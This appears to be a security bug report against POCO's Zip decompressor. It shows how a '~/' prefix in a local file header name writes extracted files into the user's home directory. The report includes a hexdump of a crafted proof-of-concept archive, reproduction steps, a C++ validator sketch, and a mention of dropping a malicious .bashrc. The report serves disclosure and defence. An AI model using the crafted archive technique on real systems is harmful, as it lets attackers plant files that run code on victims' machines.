Description
By manipulating the file name stored in a Zip local file header, the contents of the archive can be written outside the chosen output directory, into the user's home directory.
Expected behavior
Throw an exception if the filename contains a parent directory reference. isValidPath() (ZipCommon.cpp) should also reject a filename that starts with a tilde, since a leading ~/ in the entry name is resolved to the user's home directory (see below).
Actual behavior
By inserting a tilde-slash (~/) at the start of the filename field of the Zip local file header, files can be written to the user's home directory regardless of the output directory given on the command line.
Steps to reproduce the problem
Use the sample-unzip sample application as follows:
$ ./sample-unzip -f vuln.zip SOME_OUT_DIR
vuln.zip contains a single file foo whose content is the string bar; the name field of the local file header has been changed from foo to ~/o, while the central directory entry still names the file foo (see the hexdump).
vuln.zip hexdump:
00000000 50 4b 03 04 0a 00 00 00 00 00 bb 91 5f 4b e9 b3 |PK.........._K..|
00000010 a2 04 04 00 00 00 04 00 00 00 03 00 1c 00 7e 2f |..............~/|
00000020 6f 55 54 09 00 03 52 af f8 59 4d af f8 59 75 78 |oUT...R..YM..Yux|
00000030 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 62 61 72 |.............bar|
00000040 0a 50 4b 01 02 1e 03 0a 00 00 00 00 00 bb 91 5f |.PK............_|
00000050 4b e9 b3 a2 04 04 00 00 00 04 00 00 00 03 00 18 |K...............|
00000060 00 00 00 00 00 01 00 00 00 b4 81 00 00 00 00 66 |...............f|
00000070 6f 6f 55 54 05 00 03 52 af f8 59 75 78 0b 00 01 |ooUT...R..Yux...|
00000080 04 e8 03 00 00 04 e8 03 00 00 50 4b 05 06 00 00 |..........PK....|
00000090 00 00 01 00 01 00 49 00 00 00 41 00 00 00 00 00 |......I...A.....|
000000a0
After running the program, a file named o with the content bar is written to the user's home directory instead of SOME_OUT_DIR:
~/o
(o is just an example name)
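To make the two file-name fields of vuln.zip visible and to show the stricter check this report asks for, here is an added example. It is not POCO's code: the validator is my own sketch of what isValidPath() should reject, not the project's implementation, and the parsing helpers are written from the Zip format rather than taken from Poco::Zip. It embeds the 160 bytes from the hexdump above as constructed input, reads the entry name from the local file header (the name the decompressor actually writes) and from the central directory entry, and runs both through the check.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <string>

// vuln.zip from the report's hexdump (160 bytes), embedded as constructed input.
static const unsigned char kVulnZip[] = {
    0x50,0x4b,0x03,0x04,0x0a,0x00,0x00,0x00,0x00,0x00,0xbb,0x91,0x5f,0x4b,0xe9,0xb3,
    0xa2,0x04,0x04,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x03,0x00,0x1c,0x00,0x7e,0x2f,
    0x6f,0x55,0x54,0x09,0x00,0x03,0x52,0xaf,0xf8,0x59,0x4d,0xaf,0xf8,0x59,0x75,0x78,
    0x0b,0x00,0x01,0x04,0xe8,0x03,0x00,0x00,0x04,0xe8,0x03,0x00,0x00,0x62,0x61,0x72,
    0x0a,0x50,0x4b,0x01,0x02,0x1e,0x03,0x0a,0x00,0x00,0x00,0x00,0x00,0xbb,0x91,0x5f,
    0x4b,0xe9,0xb3,0xa2,0x04,0x04,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x03,0x00,0x18,
    0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0xb4,0x81,0x00,0x00,0x00,0x00,0x66,
    0x6f,0x6f,0x55,0x54,0x05,0x00,0x03,0x52,0xaf,0xf8,0x59,0x75,0x78,0x0b,0x00,0x01,
    0x04,0xe8,0x03,0x00,0x00,0x04,0xe8,0x03,0x00,0x00,0x50,0x4b,0x05,0x06,0x00,0x00,
    0x00,0x00,0x01,0x00,0x01,0x00,0x49,0x00,0x00,0x00,0x41,0x00,0x00,0x00,0x00,0x00
};
static const size_t kVulnZipLen = sizeof(kVulnZip);

static uint16_t le16(const unsigned char* p) {
    return static_cast<uint16_t>(p[0] | (p[1] << 8));
}
static uint32_t le32(const unsigned char* p) {
    return static_cast<uint32_t>(p[0]) | (static_cast<uint32_t>(p[1]) << 8) |
           (static_cast<uint32_t>(p[2]) << 16) | (static_cast<uint32_t>(p[3]) << 24);
}

// Offset of the central directory, taken from the end-of-central-directory
// record (signature PK\5\6, searched backwards because a comment may follow it).
// Returns SIZE_MAX if no such record exists.
size_t centralDirOffset(const unsigned char* zip, size_t len) {
    if (len < 22) return SIZE_MAX;
    for (size_t i = len - 22; ; --i) {
        if (le32(zip + i) == 0x06054b50) return le32(zip + i + 16);
        if (i == 0) break;
    }
    return SIZE_MAX;
}

// File name stored in the local file header at `off` (signature PK\3\4):
// name length sits at +26, the name itself at +30.
std::string localHeaderName(const unsigned char* zip, size_t len, size_t off) {
    if (off > len || len - off < 30 || le32(zip + off) != 0x04034b50) return "";
    const uint16_t nameLen = le16(zip + off + 26);
    if (len - off - 30 < nameLen) return "";
    return std::string(reinterpret_cast<const char*>(zip + off + 30), nameLen);
}

// File name stored in the central directory entry at `off` (signature PK\1\2):
// name length sits at +28, the name itself at +46.
std::string centralDirName(const unsigned char* zip, size_t len, size_t off) {
    if (off > len || len - off < 46 || le32(zip + off) != 0x02014b50) return "";
    const uint16_t nameLen = le16(zip + off + 28);
    if (len - off - 46 < nameLen) return "";
    return std::string(reinterpret_cast<const char*>(zip + off + 46), nameLen);
}

// Stricter entry-name check in the spirit of what the report asks of
// ZipCommon::isValidPath() (my own sketch, not POCO's implementation):
// no absolute path, no drive letter, no leading tilde, no ".." component.
bool isValidPath(const std::string& path) {
    if (path.empty()) return false;
    if (path[0] == '/' || path[0] == '\\' || path[0] == '~') return false;
    if (path.size() > 1 && path[1] == ':') return false;
    if (path.find('\0') != std::string::npos) return false;
    size_t start = 0;
    while (start <= path.size()) {
        size_t end = path.find_first_of("/\\", start);
        if (end == std::string::npos) end = path.size();
        if (path.compare(start, end - start, "..") == 0) return false;
        start = end + 1;
    }
    return true;
}

// True only if the archive's single entry passes the check under both the name
// the local header carries and the name the central directory advertises.
bool vulnZipEntryIsSafe() {
    const size_t cd = centralDirOffset(kVulnZip, kVulnZipLen);
    if (cd == SIZE_MAX || cd > kVulnZipLen || kVulnZipLen - cd < 46) return false;
    const size_t local = le32(kVulnZip + cd + 42);  // "relative offset of local header"
    return isValidPath(localHeaderName(kVulnZip, kVulnZipLen, local)) &&
           isValidPath(centralDirName(kVulnZip, kVulnZipLen, cd));
}

int main() {
    const size_t cd = centralDirOffset(kVulnZip, kVulnZipLen);
    const size_t local = le32(kVulnZip + cd + 42);
    std::printf("local header name:      %s\n", localHeaderName(kVulnZip, kVulnZipLen, local).c_str());
    std::printf("central directory name: %s\n", centralDirName(kVulnZip, kVulnZipLen, cd).c_str());
    std::printf("safe to extract:        %s\n", vulnZipEntryIsSafe() ? "yes" : "no");
    return 0;
}
```

The point of reading both names is that they disagree in this archive (~/o in the local header, foo in the central directory), so a decompressor that validates only the name it does not actually use for writing learns nothing; whichever name ends up in the output path must be the one checked, and rejecting a leading tilde alongside ".." and absolute paths closes this variant.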
POCO version
Compiler and version
clang version 4.0.1 (tags/RELEASE_401/final)
Operating system and version
4.13.9-300.fc27.x86_64 #1 SMP Mon Oct 23 13:41:58 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Security implications
Due to the current behavior of the Zip Decompress mechanism it is possible to write files to arbitrary locations under the user's home directory, ignoring the output directory the caller specified. For example, a manipulated .bashrc could be dropped into the user's home directory and would run the next time a shell starts.
Cheers
-Stephan Zeisberg